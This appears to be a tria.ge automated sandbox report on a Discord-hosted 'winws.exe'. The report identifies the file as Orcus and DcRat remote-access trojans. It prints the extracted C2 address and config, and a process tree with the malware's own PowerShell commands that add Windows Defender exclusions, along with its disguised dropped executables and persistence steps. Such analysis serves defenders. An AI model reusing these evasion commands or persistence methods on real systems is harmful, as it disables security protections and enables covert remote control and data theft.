Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://cdn.discorda...

windows10-2004-x64

10

https://cdn.discorda...

windows7-x64

8

https://cdn.discorda...

windows10-2004-x64

8

https://cdn.discorda...

windows10-ltsc 2021-x64

8

https://cdn.discorda...

windows11-21h2-x64

10

Analysis

  • max time kernel
    113s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/10/2024, 23:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&

Score
10/10
dcratorcusrobloxdefense_evasiondiscoveryevasionexecutioninfostealerpersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

orcus

Botnet

Roblox

C2

89.23.100.155:1337

Mutex

52641f3c61234743ba12f855fdae3135

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %AppData%\Windows\Helper\WinHelper32.exe

  • reconnect_delay

    10000

  • registry_keyname

    WinHelper32.exe

  • taskscheduler_taskname

    WinHelper32

  • watchdog_path

    AppData\WinHelperWatchdog.exe

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
    persistence
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
    evasiontrojan
  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

    ratspywarestealerorcus
  • Orcus family
    orcus
  • Orcus main payload 1 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 6 IoCs
    evasiontrojan
  • DCRat payload 1 IoCs
    rat
  • Orcurs Rat Executable 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 20 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 3 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 12 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 2 IoCs

    Possible Turn off User Account Control's privilege elevation for standard users.

    defense_evasionpersistenceprivilege_escalation
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 5 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 8 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 14 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4656
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff877f846f8,0x7ff877f84708,0x7ff877f84718
      2⤵
        PID:2872
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
        2⤵
          PID:3576
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3252
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
          2⤵
            PID:4532
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
            2⤵
              PID:3952
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
              2⤵
                PID:3956
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:8
                2⤵
                  PID:3468
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4860
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5436 /prefetch:8
                  2⤵
                    PID:2192
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
                    2⤵
                      PID:4756
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
                      2⤵
                        PID:404
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3416 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5032
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3920 /prefetch:8
                        2⤵
                          PID:1956
                        • C:\Users\Admin\Downloads\winws.exe
                          "C:\Users\Admin\Downloads\winws.exe"
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:4776
                          • C:\Program Files\Java\jre-1.8\bin\javaw.exe
                            "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\winws.exe"
                            3⤵
                            • Drops startup file
                            • Suspicious use of SetWindowsHookEx
                            PID:232
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5236
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5244
                            • C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exe
                              C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exe
                              4⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              • Suspicious use of SetWindowsHookEx
                              PID:5268
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows\Defender\yjJlDaeiCtZ3rPY3voT8EfypAtNWVOHqwTO.vbe"
                                5⤵
                                • Checks computer location settings
                                • System Location Discovery: System Language Discovery
                                PID:5776
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows\Defender\zHxvwMPtXsd9EflNyF6bR38DTMh313hvK806W5p8W9mTT85g.bat" "
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4940
                                  • C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe
                                    "C:\Users\Admin\AppData\Roaming\Windows/Defender/RunShell.exe"
                                    7⤵
                                    • Modifies WinLogon for persistence
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Drops file in Program Files directory
                                    • Drops file in Windows directory
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5204
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qlgu50dl\qlgu50dl.cmdline"
                                      8⤵
                                      • Drops file in System32 directory
                                      PID:5844
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD31.tmp" "c:\Windows\System32\CSCED94E796E85444428CB0B85CDF9B85C9.TMP"
                                        9⤵
                                          PID:5752
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\xdwd.exe'
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3588
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5648
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\RuntimeBroker.exe'
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5840
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5500
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\dllhost.exe'
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5256
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1332
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lLSWsfpTer.bat"
                                        8⤵
                                          PID:5576
                                          • C:\Windows\system32\chcp.com
                                            chcp 65001
                                            9⤵
                                              PID:5204
                                            • C:\Windows\system32\PING.EXE
                                              ping -n 10 localhost
                                              9⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Runs ping.exe
                                              PID:404
                                            • C:\Windows\ModemLogs\RuntimeBroker.exe
                                              "C:\Windows\ModemLogs\RuntimeBroker.exe"
                                              9⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3900
                                    • C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe
                                      "C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe"
                                      5⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • UAC bypass
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Windows security modification
                                      • Checks whether UAC is enabled
                                      • Hijack Execution Flow: Executable Installer File Permissions Weakness
                                      • Drops file in System32 directory
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • System policy modification
                                      PID:5928
                                      • C:\Windows\SysWOW64\WindowsInput.exe
                                        "C:\Windows\SysWOW64\WindowsInput.exe" --install
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        PID:4756
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell" Get-MpPreference -verbose
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5248
                                      • C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe
                                        "C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe"
                                        6⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        • UAC bypass
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Windows security modification
                                        • Checks whether UAC is enabled
                                        • Hijack Execution Flow: Executable Installer File Permissions Weakness
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        • System policy modification
                                        PID:4776
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell" Get-MpPreference -verbose
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5720
                                        • C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe" /launchSelfAndExit "C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe" 4776 /protectFile
                                          7⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1660
                                          • C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe
                                            "C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe" /watchProcess "C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe" 4776 "/protectFile"
                                            8⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:460
                                    • C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe
                                      "C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe"
                                      5⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Modifies registry class
                                      • Suspicious use of SetWindowsHookEx
                                      PID:460
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\blockComAgentdll\l2A594olLEJWUEUfw4GfnauDbYxQl.vbe"
                                        6⤵
                                        • Checks computer location settings
                                        • System Location Discovery: System Language Discovery
                                        PID:5320
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\blockComAgentdll\Q5HIcCBrM4kJ2gRS.bat" "
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5812
                                          • C:\blockComAgentdll\hypercommonSvc.exe
                                            "C:\blockComAgentdll/hypercommonSvc.exe"
                                            8⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            • Modifies registry class
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1456
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rVXWMmV2xV.bat"
                                              9⤵
                                                PID:1540
                                                • C:\Windows\system32\chcp.com
                                                  chcp 65001
                                                  10⤵
                                                    PID:5220
                                                  • C:\Windows\system32\w32tm.exe
                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    10⤵
                                                      PID:4592
                                                    • C:\Users\All Users\wininit.exe
                                                      "C:\Users\All Users\wininit.exe"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3312
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                      2⤵
                                        PID:5408
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
                                        2⤵
                                          PID:5248
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
                                          2⤵
                                            PID:5464
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
                                            2⤵
                                              PID:6088
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:1472
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:4884
                                              • C:\Windows\System32\rundll32.exe
                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                1⤵
                                                  PID:5664
                                                • C:\Users\Admin\Downloads\winws.exe
                                                  "C:\Users\Admin\Downloads\winws.exe"
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:5796
                                                  • C:\Program Files\Java\jre-1.8\bin\javaw.exe
                                                    "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\winws.exe"
                                                    2⤵
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5824
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5984
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5992
                                                  • C:\Program Files\Java\jre-1.8\bin\javaw.exe
                                                    "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\winws.exe"
                                                    2⤵
                                                    • Drops startup file
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5912
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6092
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6136
                                                    • C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exe
                                                      C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exe
                                                      3⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies registry class
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:6128
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows\Defender\yjJlDaeiCtZ3rPY3voT8EfypAtNWVOHqwTO.vbe"
                                                        4⤵
                                                        • Checks computer location settings
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5336
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows\Defender\zHxvwMPtXsd9EflNyF6bR38DTMh313hvK806W5p8W9mTT85g.bat" "
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5608
                                                          • C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe
                                                            "C:\Users\Admin\AppData\Roaming\Windows/Defender/RunShell.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:404
                                                      • C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe
                                                        "C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5540
                                                      • C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe
                                                        "C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe"
                                                        4⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry class
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5868
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\blockComAgentdll\l2A594olLEJWUEUfw4GfnauDbYxQl.vbe"
                                                          5⤵
                                                          • Checks computer location settings
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5144
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\blockComAgentdll\Q5HIcCBrM4kJ2gRS.bat" "
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5220
                                                            • C:\blockComAgentdll\hypercommonSvc.exe
                                                              "C:\blockComAgentdll/hypercommonSvc.exe"
                                                              7⤵
